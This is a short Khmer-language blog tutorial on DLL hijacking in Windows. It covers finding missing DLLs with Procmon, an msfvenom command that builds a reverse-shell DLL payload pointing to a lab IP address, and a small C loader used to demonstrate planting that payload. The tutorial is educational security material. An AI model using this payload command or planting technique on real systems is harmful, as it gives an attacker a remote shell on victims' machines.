This page looks best with JavaScript enabled

DLL Hijacking Attack 0x01

 ·  β˜• 1 min read  ·  🐱 thik

DLL hijacking αž¬αžŠαŸ‚αž›αž‚αŸαžαŸ’αžšαžΌαžœαž”αžΆαž“αžŸαŸ’αž‚αžΆαž›αŸ‹αžαžΆαž‡αžΆ DLL preloading ឬ DLL side-loading αž‚αžΊαž‡αžΆαžœαž·αž’αžΈαžŸαžΆαžŸαŸ’αžαŸ’αžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαžŠαŸ„αž™αž’αŸ’αžœαžΎαž€αžΆαžšαž”αŸ„αž€αž”αž‰αŸ’αž†αŸ„αžαžšαžΆαž›αŸ‹αž€αž˜αŸ’αž˜αžœαž·αž’αžΈ (Software) αžŠαŸ‚αž›αž˜αžΆαž“αž“αŸ…αž€αŸ’αž“αž»αž„αž”αŸ’αžšαž–αŸαž“αŸ’αž’αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΈαž“αžŠαžΌαž‘αžΆαŸ†αž„αž’αžŸαŸ‹αž€αŸ’αž“αž»αž„αž€αžΆαžšαž–αŸ’αž™αžΆαž™αžΆαž˜αž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš DLL αžŠαŸ‚αž›αž˜αžΆαž“αž”αž„αŸ’αž€αž”αŸ‹αž“αžΌαžœαž˜αŸαžšαŸ„αž‚αž‡αžΆαž‡αžΆαž„αž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš DLL αž˜αŸ‚αž“αž‘αŸ‚αž“αž“αŸƒαž€αž˜αŸ’αž˜αžœαž·αž’αžΈ αŸ”

Finding Missing DLLs

αžŠαžΎαž˜αŸ’αž”αžΈαžŸαŸ’αžœαŸ‚αž„αžšαž€αžšαžΆαž›αŸ‹ DLL αžŠαŸ‚αž›αž”αžΆαž“αž”αžΆαžαŸ‹αž“αŸ…αž€αŸ’αž“αž»αž„αž”αŸ’αžšαž–αŸαž“αŸ’αž’αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαžœαžΈαž“αžŠαžΌαž™αžΎαž„αž’αžΆαž…αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž€αž˜αŸ’αž˜αžœαž·αž’αžΈ Procmon αž αžΎαž™αž’αŸ’αžœαžΎαž€αžΆαžš Filter αž›αž€αŸ’αžαžŽαŸ’αžŒαž‘αžΆαŸ†αž„αž–αžΈαžšαžŠαžΌαž…αžšαžΌαž”αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

Filter Include 1
Filter Include 2

αž€αŸ’αžšαŸ„αž™αž–αžΈαž™αžΎαž„αž’αŸ’αžœαžΎαž€αžΆαžšαžŠαžΆαž€αŸ‹αž”αž‰αŸ’αž‡αžΌαž› Filter αž‘αžΆαŸ†αž„αž–αžΈαžšαžšαž½αž…αžšαžΆαž›αŸ‹ αžŸαžΌαž˜αž…αž»αž… Apply αž“αŸ„αŸ‡αž€αž˜αŸ’αž˜αžœαž·αž’αžΈαž“αžΉαž„αž’αŸ’αžœαžΎαž€αžΆαžšαž…αŸ’αžšαŸ„αŸ‡αž…αŸαž‰αž“αžΌαžœαžšαžΆαž›αŸ‹ DLLs αž‘αžΆαŸ†αž„αž‘αžΆαž™αžŽαžΆαžŠαŸ‚αž›αžαŸ’αžšαžΌαžœαž€αžΆαžšαž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš αž”αŸ‰αž»αž“αŸ’αžαŸ‚αžœαžΆαž˜αž·αž“αžαŸ’αžšαžΌαžœαž”αžΆαž“αžšαž€αžƒαžΎαž‰αž“αŸ…αž€αŸ’αž“αž»αž„αž”αŸ’αžšαž–αŸαž“αŸ’αž’ αŸ”

Filter Results

αž”αŸ’αžšαžŸαž·αž“αž”αžΎαž™αžΎαž„αž…αž„αŸ‹αž’αŸ’αžœαžΎαž€αžΆαžš Filter αž‘αŸ…αž›αžΎαž€αž˜αŸ’αž˜αžœαž·αž’αžΈαžŽαžΆαž˜αž½αž™αž‡αžΆαž€αŸ‹αž›αžΆαž€αŸ‹αž“αŸ„αŸ‡αž™αžΎαž„αžαŸ’αžšαžΌαžœαž”αž“αŸ’αžαŸ‚αž˜αž€αžΆαžšαž€αŸ†αžŽαžαŸ‹ Filter αžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

Filter By Process Name
Filter By Process Name Apply

Exploation Path

αžŠαŸ†αž”αžΌαž„αž™αžΎαž„αžαŸ’αžšαžΌαžœαž€αžΆαžš DLL Payload αžŠαŸ„αž™αž™αžΎαž„αž’αžΆαž…αž”αž„αŸ’αž€αžΎαžαžœαžΆαž”αžΆαž“αžαžΆαž˜αžšαž™αŸˆ Framework αž‡αžΆαž…αŸ’αžšαžΎαž“αžŠαžΌαž…αž‡αžΆ Metasploit / Cobalt Strike​ / DCRat αŸ”αž›αŸ” αž™αžΎαž„αž“αžΉαž„αž”αž„αŸ’αž€αžΎαžαžœαžΆαžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ MSFvenom αžŠαŸ‚αž›αž‡αžΆ Standalone Payload Generator αžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1
msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.60.136 lport=4433 -f dll > payload.dll

αž…αžΉαž„αž“αŸ…αž€αŸ’αž“αž»αž„αž’αžαŸ’αžαž”αž‘αž“αŸαŸ‡αž™αžΎαž„αž“αžΉαž„αžŸαžΆαž€αž›αŸ’αž”αž„αž”αž„αŸ’αž€αžΎαžαž―αž€αžŸαžΆαžš EXE αž˜αž½αž™αžŠαŸ‚αž›αž–αŸ’αž™αžΆαž™αžΆαž˜αž”αžΎαž€αž―αž€αžŸαžΆαžš DLL αžˆαŸ’αž˜αŸ„αŸ‡αžαžΆ test.dll αžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž—αžΆαžŸαžΆαžš C αŸ”

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
#include <windows.h>
#include <stdio.h>
// Compile with: i686-w64-mingw32-gcc-win32 loader.c -o loader.exe

int main(void) {
	HINSTANCE hDll;
	hDll = LoadLibrary(TEXT("test.dll"));
	if(hDll != NULL) {
			printf("DLL was found!\n");
	} else {
			printf("DLL not found!\n");
	}
	return 0;
}

αž€αŸ’αžšαŸ„αž™αž–αžΈαžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž―αž€αžŸαžΆαžš loader.exe αžαžΆαž„αž›αžΎαž™αžΎαž„αž“αžΉαž„αž‘αž‘αž½αž›αž”αžΆαž“αžŸαžΆαžšαž”αŸ’αžšαžΆαž”αŸ‹αžαžΆαž―αž€αžŸαžΆαžš DLL αžˆαŸ’αž˜αŸ„αŸ‡αžαžΆ test.dll αž”αžΆαž“αž”αžΆαžαŸ‹αž”αž„αŸ‹ αžšαž€αž˜αž·αž“αžƒαžΎαž‰ αŸ”

Filter By Process Name Apply

αžŠαžΌαž…αž“αŸαŸ‡αž”αžΎαž™αžΎαž„αž™αž€ Payload αžšαž”αžŸαŸ‹αž™αžΎαž„αž€αŸ‚αžˆαŸ’αž˜αŸ„αŸ‡αž²αŸ’αž™αžŠαžΌαž… αž“αž·αž„αž…αž˜αŸ’αž›αž„αžŠαžΆαž€αŸ‹αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„αžαžαž―αž€αžŸαžΆαžšαž“αŸƒ test.dll αžŠαŸ‚αž› loader.exe αžŸαŸ’αžœαŸ‚αž„αžšαž€αž˜αž·αž“αžƒαžΎαž‰ αž“αŸ„αŸ‡αž™αžΎαž„αž“αžΉαž„αž‘αž‘αž½αž›αž”αžΆαž“ Reverse Shell αž‡αžΆαž€αŸ‹αž‡αžΆαž˜αž·αž“αžαžΆαž“ αŸ•

Filter By Process Name Apply

Share on

Thik
WRITTEN BY
thik
Security Researcher